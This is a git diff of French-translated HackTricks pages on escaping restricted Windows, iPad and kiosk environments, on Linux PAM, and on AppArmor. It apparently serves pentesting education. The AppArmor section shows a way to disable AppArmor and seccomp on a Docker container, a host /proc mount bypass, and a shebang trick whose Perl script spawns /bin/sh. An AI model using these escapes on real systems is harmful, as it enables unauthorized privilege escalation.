[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. @@ -46,7 +46,7 @@ Vous devriez vérifier si vous pouvez : ## Exécution de commandes -Peut-être **en utilisant une option `Ouvrir avec`** vous pouvez ouvrir/exécuter une sorte de shell. +Peut-être qu'en utilisant l'option `Ouvrir avec`, vous pouvez ouvrir/exécuter une sorte de shell. ### Windows @@ -63,11 +63,11 @@ _bash, sh, zsh..._ Plus ici : [https://gtfobins.github.io/](https://gtfobins.git * **Variables d'environnement** : Il y a beaucoup de variables d'environnement qui pointent vers un chemin * **Autres protocoles** : _about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_ * **Liens symboliques** -* **Raccourcis** : CTRL+N (ouvrir une nouvelle session), CTRL+R (Exécuter des commandes), CTRL+SHIFT+ESC (Gestionnaire des tâches), Windows+E (ouvrir l'explorateur), CTRL-B, CTRL-I (Favoris), CTRL-H (Historique), CTRL-L, CTRL-O (Fichier/Ouvrir la boîte de dialogue), CTRL-P (Boîte de dialogue d'impression), CTRL-S (Enregistrer sous) +* **Raccourcis** : CTRL+N (ouvrir une nouvelle session), CTRL+R (Exécuter des commandes), CTRL+SHIFT+ESC (Gestionnaire des tâches), Windows+E (ouvrir l'explorateur), CTRL-B, CTRL-I (Favoris), CTRL-H (Historique), CTRL-L, CTRL-O (Fichier/Ouvrir la boîte de dialogue), CTRL-P (Boîte de dialogue d'impression), CTRL-S (Enregistrer sous) * Menu administratif caché : CTRL-ALT-F8, CTRL-ESC-F9 -* **URI Shell** : _shell:Outils administratifs, shell:Bibliothèques de documents, shell:Bibliothèques, shell:Profils d'utilisateurs, shell:Personnel, shell:Dossier de recherche, shell:Système, shell:Réseau, shell:Envoyer vers, shell:Profils d'utilisateurs, shell:Outils administratifs communs, shell:Ordinateur, shell:Internet_ +* **URI Shell** : _shell:Outils administratifs, shell:Bibliothèques de documents, shell:Bibliothèques, shell:Profils d'utilisateurs, shell:Personnel, shell:Dossier de recherche, shell:Système, shell:Réseau, shell:Envoyer à, shell:Profils d'utilisateurs, shell:Outils administratifs communs, shell:Poste de travail, shell:Internet_ * **Chemins UNC** : Chemins pour se connecter à des dossiers partagés. Vous devriez essayer de vous connecter au C$ de la machine locale ("\\\127.0.0.1\c$\Windows\System32") -* **Autres chemins UNC** : +* **Autres chemins UNC :** | UNC | UNC | UNC | | ------------------------- | -------------- | -------------------- | @@ -101,10 +101,10 @@ Explorateur : [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2 ## Raccourcis -* Touches collantes – Appuyez sur SHIFT 5 fois -* Touches de souris – SHIFT+ALT+NUMLOCK +* Sticky Keys – Appuyez sur SHIFT 5 fois +* Mouse Keys – SHIFT+ALT+NUMLOCK * Contraste élevé – SHIFT+ALT+PRINTSCN -* Touches de basculement – Maintenez NUMLOCK enfoncé pendant 5 secondes +* Touche de bascule – Maintenez NUMLOCK enfoncé pendant 5 secondes * Touches de filtre – Maintenez la touche droite SHIFT enfoncée pendant 12 secondes * WINDOWS+F1 – Recherche Windows * WINDOWS+D – Afficher le bureau @@ -141,7 +141,7 @@ C'est une barre d'outils qui apparaît en haut à gauche de l'image lorsqu'elle Tapez ces URL pour obtenir une vue de l'Explorateur : * `shell:Outils d'administration` -* `shell:Bibliothèques de documents` +* `shell:Bibliothèque de documents` * `shell:Bibliothèques` * `shell:ProfilsUtilisateurs` * `shell:Personnel` @@ -182,7 +182,7 @@ Source : https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de1981 * Balayez vers le haut avec quatre (ou cinq) doigts / Double-tapez sur le bouton Accueil : Pour afficher la vue multitâche et changer d'application -* Balayez d'un côté ou de l'autre avec quatre ou cinq doigts : Pour passer à l'application suivante/précédente +* Balayez d'un côté ou de l'autre avec quatre ou cinq doigts : Pour changer vers l'application suivante/précédente * Pincez l'écran avec cinq doigts / Touchez le bouton Accueil / Balayez vers le haut avec 1 doigt depuis le bas de l'écran en un mouvement rapide vers le haut : Pour accéder à l'Accueil @@ -194,7 +194,7 @@ Source : https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de1981 * Balayez avec 1 doigt depuis la gauche de l'écran sur 1-2 pouces : Pour voir la vue Aujourd'hui -* Balayez rapidement avec 1 doigt du centre de l'écran vers la droite ou la gauche : Pour passer à l'application suivante/précédente +* Balayez rapidement avec 1 doigt depuis le centre de l'écran vers la droite ou la gauche : Pour changer vers l'application suivante/précédente * Maintenez enfoncé le bouton Marche/Arrêt en haut à droite de l'iPad + Déplacez le curseur Éteindre tout à droite : Pour éteindre @@ -243,9 +243,9 @@ Ces raccourcis sont pour les paramètres visuels et sonores, en fonction de l'ut | ⌘⇧H (Commande-Majuscule-H) | Aller à l'Accueil | | ⌘ (Espace) | Ouvrir Spotlight | | ⌘⇥ (Commande-Tabulation) | Liste des dix dernières applications utilisées | -| ⌘\~ | Aller à la dernière application | +| ⌘\~ | Aller à la dernière application | | ⌘⇧3 (Commande-Majuscule-3) | Capture d'écran (apparaît en bas à gauche pour enregistrer ou agir dessus) | -| ⌘⇧4 | Capture d'écran et l'ouvrir dans l'éditeur | +| ⌘⇧4 | Capture d'écran et l'ouvrir dans l'éditeur | | Maintenir enfoncé ⌘ | Liste des raccourcis disponibles pour l'application | | ⌘⌥D (Commande-Option/Alt-D) | Faire apparaître le dock | | ^⌥H (Contrôle-Option-H) | Bouton Accueil | @@ -254,7 +254,7 @@ Ces raccourcis sont pour les paramètres visuels et sonores, en fonction de l'ut | Échap | Bouton Retour | | → (Flèche droite) | Élément suivant | | ← (Flèche gauche) | Élément précédent | -| ↑↓ (Flèche vers le haut, Flèche vers le bas) | Appuyer simultanément sur l'élément sélectionné | +| ↑↓ (Flèche vers le haut, flèche vers le bas) | Appuyer simultanément sur l'élément sélectionné | | ⌥ ↓ (Option-Flèche vers le bas) | Faire défiler vers le bas | | ⌥↑ (Option-Flèche vers le haut) | Faire défiler vers le haut | | ⌥← ou ⌥→ (Option-Flèche gauche ou Option-Flèche droite) | Faire défiler vers la gauche ou la droite | @@ -266,29 +266,29 @@ Ces raccourcis sont pour les paramètres visuels et sonores, en fonction de l'ut | Raccourci | Action | | ----------------------- | ------------------------------------------------ | -| ⌘L (Commande-L) | Ouvrir l'emplacement | +| ⌘L (Command-L) | Ouvrir l'emplacement | | ⌘T | Ouvrir un nouvel onglet | -| ⌘W | Fermer l'onglet actuel | +| ⌘W | Fermer l'onglet actuel | | ⌘R | Actualiser l'onglet actuel | | ⌘. | Arrêter le chargement de l'onglet actuel | | ^⇥ | Passer à l'onglet suivant | -| ^⇧⇥ (Contrôle-Shift-Tab) | Aller à l'onglet précédent | +| ^⇧⇥ (Control-Shift-Tab) | Aller à l'onglet précédent | | ⌘L | Sélectionner le champ de texte/URL pour le modifier| -| ⌘⇧T (Commande-Shift-T) | Ouvrir le dernier onglet fermé (peut être utilisé plusieurs fois) | +| ⌘⇧T (Command-Shift-T) | Ouvrir le dernier onglet fermé (peut être utilisé plusieurs fois) | | ⌘\[ | Revenir en arrière dans l'historique de navigation | -| ⌘] | Aller en avant dans l'historique de navigation | -| ⌘⇧R | Activer le mode Lecteur | +| ⌘] | Aller en avant dans l'historique de navigation | +| ⌘⇧R | Activer le mode Lecteur | ### Raccourcis Mail | Raccourci | Action | | -------------------------- | ---------------------------- | | ⌘L | Ouvrir l'emplacement | -| ⌘T | Ouvrir un nouvel onglet | +| ⌘T | Ouvrir un nouvel onglet | | ⌘W | Fermer l'onglet actuel | | ⌘R | Actualiser l'onglet actuel | | ⌘. | Arrêter le chargement de l'onglet actuel | -| ⌘⌥F (Commande-Option/Alt-F) | Rechercher dans votre boîte de réception | +| ⌘⌥F (Command-Option/Alt-F) | Rechercher dans votre boîte de réception | # Références @@ -298,15 +298,15 @@ Ces raccourcis sont pour les paramètres visuels et sonores, en fonction de l'ut * [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html) -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
-[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **malwares voleurs**. +[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. -Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de malwares volant des informations. +Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations. -Vous pouvez consulter leur site web et essayer leur moteur **gratuitement** sur : +Vous pouvez consulter leur site Web et essayer leur moteur gratuitement sur : {% embed url="https://whiteintel.io" %} @@ -319,7 +319,7 @@ Autres façons de soutenir HackTricks : * Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) * Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) -* **Rejoignez** 💬 le groupe Discord](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Rejoignez** 💬 le groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md b/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md index 170c2af68..0391352d7 100644 --- a/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md +++ b/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md @@ -4,7 +4,7 @@ Autres façons de soutenir HackTricks : -* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)! +* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) * Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** @@ -12,9 +12,9 @@ Autres façons de soutenir HackTricks : -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. @@ -35,7 +35,7 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur - Les **systèmes Solaris et UNIX** utilisent généralement un fichier de configuration central situé à `/etc/pam.conf`. - Les **systèmes Linux** préfèrent une approche basée sur les répertoires, stockant les configurations spécifiques aux services dans `/etc/pam.d`. Par exemple, le fichier de configuration pour le service de connexion se trouve à `/etc/pam.d/login`. -Un exemple de configuration PAM pour le service de connexion pourrait ressembler à ceci: +Un exemple de configuration PAM pour le service de connexion pourrait ressembler à ceci : ```text auth required /lib/security/pam_securetty.so auth required /lib/security/pam_nologin.so @@ -59,24 +59,24 @@ Ces royaumes, ou groupes de gestion, comprennent **auth**, **account**, **passwo ### **Contrôles des modules PAM** -Les contrôles dictent la réponse du module en cas de succès ou d'échec, influençant le processus d'authentification global. Ceux-ci incluent : +Les contrôles dictent la réponse du module en cas de succès ou d'échec, influençant le processus d'authentification global. Ils comprennent : -- **Requis** : L'échec d'un module requis entraîne éventuellement un échec, mais seulement après que tous les modules ultérieurs ont été vérifiés. +- **Requis** : L'échec d'un module requis entraîne éventuellement un échec, mais seulement après vérification de tous les modules suivants. - **Requis** : Arrêt immédiat du processus en cas d'échec. - **Suffisant** : Le succès contourne le reste des vérifications du même royaume à moins qu'un module ultérieur ne échoue. - **Optionnel** : Ne provoque un échec que s'il est le seul module dans la pile. -### Exemple de scénario +### Scénario d'exemple -Dans une configuration avec plusieurs modules d'authentification, le processus suit un ordre strict. Si le module `pam_securetty` trouve le terminal de connexion non autorisé, les connexions root sont bloquées, mais tous les modules sont toujours traités en raison de son statut "requis". Le module `pam_env` définit des variables d'environnement, aidant potentiellement à l'expérience utilisateur. Les modules `pam_ldap` et `pam_unix` travaillent ensemble pour authentifier l'utilisateur, `pam_unix` tentant d'utiliser un mot de passe précédemment fourni, améliorant l'efficacité et la flexibilité des méthodes d'authentification. +Dans une configuration avec plusieurs modules d'authentification, le processus suit un ordre strict. Si le module `pam_securetty` trouve le terminal de connexion non autorisé, les connexions root sont bloquées, mais tous les modules sont toujours traités en raison de son statut "requis". Le module `pam_env` définit des variables d'environnement, aidant potentiellement à l'expérience utilisateur. Les modules `pam_ldap` et `pam_unix` travaillent ensemble pour authentifier l'utilisateur, `pam_unix` tentant d'utiliser un mot de passe précédemment fourni, améliorant ainsi l'efficacité et la flexibilité des méthodes d'authentification. ## Références * [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434) -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. @@ -96,7 +96,7 @@ Autres façons de soutenir HackTricks : * Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) * Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Rejoignez** 💬 le groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe Telegram](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Rejoignez** 💬 le groupe Discord](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/linux-hardening/privilege-escalation/docker-security/apparmor.md b/linux-hardening/privilege-escalation/docker-security/apparmor.md index a5670ba53..3c5527863 100644 --- a/linux-hardening/privilege-escalation/docker-security/apparmor.md +++ b/linux-hardening/privilege-escalation/docker-security/apparmor.md @@ -4,23 +4,23 @@ Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)! -Autres façons de soutenir HackTricks: +Autres façons de soutenir HackTricks : -* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)! -* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) -* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub. +- Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! +- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) +- Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) +- **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +- **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. -Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants voleurs d'informations. +Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations. Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur : @@ -30,12 +30,12 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur ## Informations de base -AppArmor est une **amélioration du noyau conçue pour restreindre les ressources disponibles aux programmes via des profils par programme**, mettant en œuvre efficacement un contrôle d'accès obligatoire (MAC) en liant directement les attributs de contrôle d'accès aux programmes plutôt qu'aux utilisateurs. Ce système fonctionne en **chargeant des profils dans le noyau**, généralement au démarrage, et ces profils dictent les ressources auxquelles un programme peut accéder, telles que les connexions réseau, l'accès aux sockets bruts et les autorisations de fichier. +AppArmor est une **amélioration du noyau conçue pour restreindre les ressources disponibles aux programmes via des profils par programme**, mettant en œuvre efficacement un contrôle d'accès obligatoire (MAC) en liant directement les attributs de contrôle d'accès aux programmes au lieu des utilisateurs. Ce système fonctionne en **chargeant des profils dans le noyau**, généralement au démarrage, et ces profils dictent les ressources auxquelles un programme peut accéder, telles que les connexions réseau, l'accès aux sockets bruts et les autorisations de fichier. Il existe deux modes opérationnels pour les profils AppArmor : -- **Mode d'application des règles** : Ce mode applique activement les politiques définies dans le profil, bloquant les actions qui violent ces politiques et journalisant toute tentative de les violer via des systèmes tels que syslog ou auditd. -- **Mode de plainte** : Contrairement au mode d'application des règles, le mode de plainte ne bloque pas les actions contraires aux politiques du profil. Au lieu de cela, il journalise ces tentatives en tant que violations de la politique sans imposer de restrictions. +- **Mode d'application des règles** : Ce mode applique activement les politiques définies dans le profil, bloquant les actions qui violent ces politiques et journalisant toute tentative de les violer à travers des systèmes comme syslog ou auditd. +- **Mode de plainte** : Contrairement au mode d'application des règles, le mode de plainte ne bloque pas les actions contraires aux politiques du profil. Au lieu de cela, il journalise ces tentatives en tant que violations de politique sans imposer de restrictions. ### Composants d'AppArmor @@ -47,9 +47,9 @@ Il existe deux modes opérationnels pour les profils AppArmor : ### Chemin des profils Les profils AppArmor sont généralement enregistrés dans _**/etc/apparmor.d/**_\ -Avec `sudo aa-status`, vous pourrez lister les binaires restreints par un profil. Si vous remplacez le caractère "/" par un point du chemin de chaque binaire répertorié, vous obtiendrez le nom du profil AppArmor à l'intérieur du dossier mentionné. +Avec `sudo aa-status`, vous pourrez lister les binaires restreints par un profil. Si vous remplacez le caractère "/" par un point du chemin de chaque binaire répertorié, vous obtiendrez le nom du profil apparmor à l'intérieur du dossier mentionné. -Par exemple, un profil **AppArmor** pour _/usr/bin/man_ sera situé dans _/etc/apparmor.d/usr.bin.man_ +Par exemple, un profil **apparmor** pour _/usr/bin/man_ sera situé dans _/etc/apparmor.d/usr.bin.man_ ### Commandes ```bash @@ -63,7 +63,7 @@ aa-mergeprof #used to merge the policies ``` ## Création d'un profil -* Afin d'indiquer l'exécutable concerné, les **chemins absolus et les caractères génériques** sont autorisés (pour le globbing de fichiers) pour spécifier les fichiers. +* Pour indiquer l'exécutable affecté, les **chemins absolus et les caractères génériques** sont autorisés (pour le globbing de fichiers) pour spécifier les fichiers. * Pour indiquer l'accès que le binaire aura aux **fichiers**, les **contrôles d'accès** suivants peuvent être utilisés : * **r** (lecture) * **w** (écriture) @@ -74,7 +74,7 @@ aa-mergeprof #used to merge the policies * **Px** (exécuter sous un autre profil, après avoir nettoyé l'environnement) * **Cx** (exécuter sous un profil enfant, après avoir nettoyé l'environnement) * **Ux** (exécuter sans confinement, après avoir nettoyé l'environnement) -* **Des variables** peuvent être définies dans les profils et peuvent être manipulées depuis l'extérieur du profil. Par exemple : @{PROC} et @{HOME} (ajoutez #include \ au fichier de profil) +* Des **variables** peuvent être définies dans les profils et peuvent être manipulées depuis l'extérieur du profil. Par exemple : @{PROC} et @{HOME} (ajoutez #include \ au fichier de profil) * Les **règles de refus** sont prises en charge pour remplacer les règles d'autorisation. ### aa-genprof @@ -96,7 +96,7 @@ En utilisant les touches fléchées, vous pouvez sélectionner ce que vous voule ### aa-easyprof -Vous pouvez également créer un modèle de profil apparmor d'un binaire avec: +Vous pouvez également créer un modèle de profil apparmor d'un binaire avec : ```bash sudo aa-easyprof /path/to/binary # vim:syntax=apparmor @@ -122,7 +122,7 @@ sudo aa-easyprof /path/to/binary } ``` {% hint style="info" %} -Notez que par défaut, dans un profil créé, rien n'est autorisé, donc tout est refusé. Vous devrez ajouter des lignes comme `/etc/passwd r,` pour autoriser la lecture binaire de `/etc/passwd`, par exemple. +Notez qu'en créant un profil, par défaut, rien n'est autorisé, donc tout est refusé. Vous devrez ajouter des lignes comme `/etc/passwd r,` pour autoriser la lecture binaire de `/etc/passwd`, par exemple. {% endhint %} Vous pouvez ensuite **appliquer** le nouveau profil avec @@ -149,7 +149,7 @@ apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile ``` ## Journaux -Exemple de journaux **AUDIT** et **DENIED** du fichier _/var/log/audit/audit.log_ de l'exécutable **`service_bin`**: +Exemple de journaux **AUDIT** et **DENIED** provenant de _/var/log/audit/audit.log_ de l'exécutable **`service_bin`**: ```bash type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000 type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 @@ -195,7 +195,7 @@ Par défaut, le profil **Apparmor docker-default** est généré à partir de [h **Résumé du profil docker-default**: - **Accès** à tout le **réseau** -- Aucune **capacité** n'est définie (Cependant, certaines capacités proviendront de l'inclusion des règles de base de base, c'est-à-dire #include \) +- Aucune **capacité** n'est définie (Cependant, certaines capacités proviendront de l'inclusion de règles de base de base, c'est-à-dire #include \) - **Écriture** dans n'importe quel fichier **/proc** n'est **pas autorisée** - Les autres **sous-répertoires**/**fichiers** de /**proc** et /**sys** se voient **refuser** l'accès en lecture/écriture/blocage/liens/exécution - Le **montage** n'est **pas autorisé** @@ -216,7 +216,7 @@ Vous devez **désactiver apparmor** pour contourner ses restrictions : ```bash docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash ``` -Notez que par défaut, **AppArmor** interdit également au conteneur de monter des dossiers de l'intérieur même avec la capacité SYS_ADMIN. +Notez que par défaut **AppArmor** interdit également au conteneur de monter des dossiers de l'intérieur même avec la capacité SYS\_ADMIN. Notez que vous pouvez **ajouter/supprimer** des **capacités** au conteneur Docker (cela restera tout de même restreint par des méthodes de protection comme **AppArmor** et **Seccomp**): @@ -240,19 +240,19 @@ Pour activer le profil, nous devons faire ce qui suit : ``` sudo apparmor_parser -r -W mydocker ``` -Pour répertorier les profils, nous pouvons exécuter la commande suivante. La commande ci-dessous répertorie mon nouveau profil AppArmor. +Pour lister les profils, nous pouvons exécuter la commande suivante. La commande ci-dessous liste mon nouveau profil AppArmor. ``` $ sudo apparmor_status | grep mydocker mydocker ``` -Comme indiqué ci-dessous, nous obtenons une erreur lors de la tentative de modification de "/etc/" car le profil AppArmor empêche l'accès en écriture à "/etc". +Comme indiqué ci-dessous, une erreur se produit lors de la tentative de modification de "/etc/" car le profil AppArmor empêche l'accès en écriture à "/etc". ``` $ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost busybox chmod 400 /etc/hostname chmod: /etc/hostname: Permission denied ``` ### Contournement d'AppArmor Docker1 -Vous pouvez trouver quel **profil apparmor exécute un conteneur** en utilisant: +Vous pouvez trouver quel **profil apparmor exécute un conteneur** en utilisant : ```bash docker inspect 9d622d73a614 | grep lowpriv "AppArmorProfile": "lowpriv", @@ -264,11 +264,15 @@ find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null ``` ### Contournement d'AppArmor Docker -**AppArmor est basé sur les chemins**, cela signifie que même s'il pourrait **protéger** les fichiers à l'intérieur d'un répertoire comme **`/proc`**, si vous pouvez **configurer comment le conteneur va être exécuté**, vous pourriez **monter** le répertoire proc de l'hôte à l'intérieur de **`/host/proc`** et il **ne sera plus protégé par AppArmor**. +**Dans le cas étrange où vous pouvez modifier le profil apparmor docker et le recharger.** Vous pourriez supprimer les restrictions et les "contourner". + +### Contournement d'AppArmor Docker 2 + +**AppArmor est basé sur les chemins**, cela signifie que même s'il pourrait **protéger** les fichiers à l'intérieur d'un répertoire comme **`/proc`** si vous pouvez **configurer comment le conteneur va être exécuté**, vous pourriez **monter** le répertoire proc de l'hôte à l'intérieur de **`/host/proc`** et il **ne sera plus protégé par AppArmor**. ### Contournement de Shebang AppArmor -Dans [**ce bug**](https://bugs.launchpad.net/apparmor/+bug/1911431), vous pouvez voir un exemple de comment **même si vous empêchez perl d'être exécuté avec certaines ressources**, si vous créez simplement un script shell **spécifiant** dans la première ligne **`#!/usr/bin/perl`** et que vous **exécutez le fichier directement**, vous pourrez exécuter ce que vous voulez. Par exemple: +Dans [**ce bug**](https://bugs.launchpad.net/apparmor/+bug/1911431) vous pouvez voir un exemple de comment **même si vous empêchez perl d'être exécuté avec certaines ressources**, si vous créez simplement un script shell **spécifiant** dans la première ligne **`#!/usr/bin/perl`** et que vous **exécutez le fichier directement**, vous pourrez exécuter ce que vous voulez. Par exemple: ```perl echo '#!/usr/bin/perl use POSIX qw(strftime); @@ -278,13 +282,13 @@ exec "/bin/sh"' > /tmp/test.pl chmod +x /tmp/test.pl /tmp/test.pl ``` -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **malwares voleurs**. -Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de malwares volant des informations. +Leur objectif principal est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de malwares volant des informations. Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur : @@ -296,10 +300,10 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur Autres façons de soutenir HackTricks : -* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)! +* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) * Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub. diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md index 7b59d97be..7638139c9 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md +++ 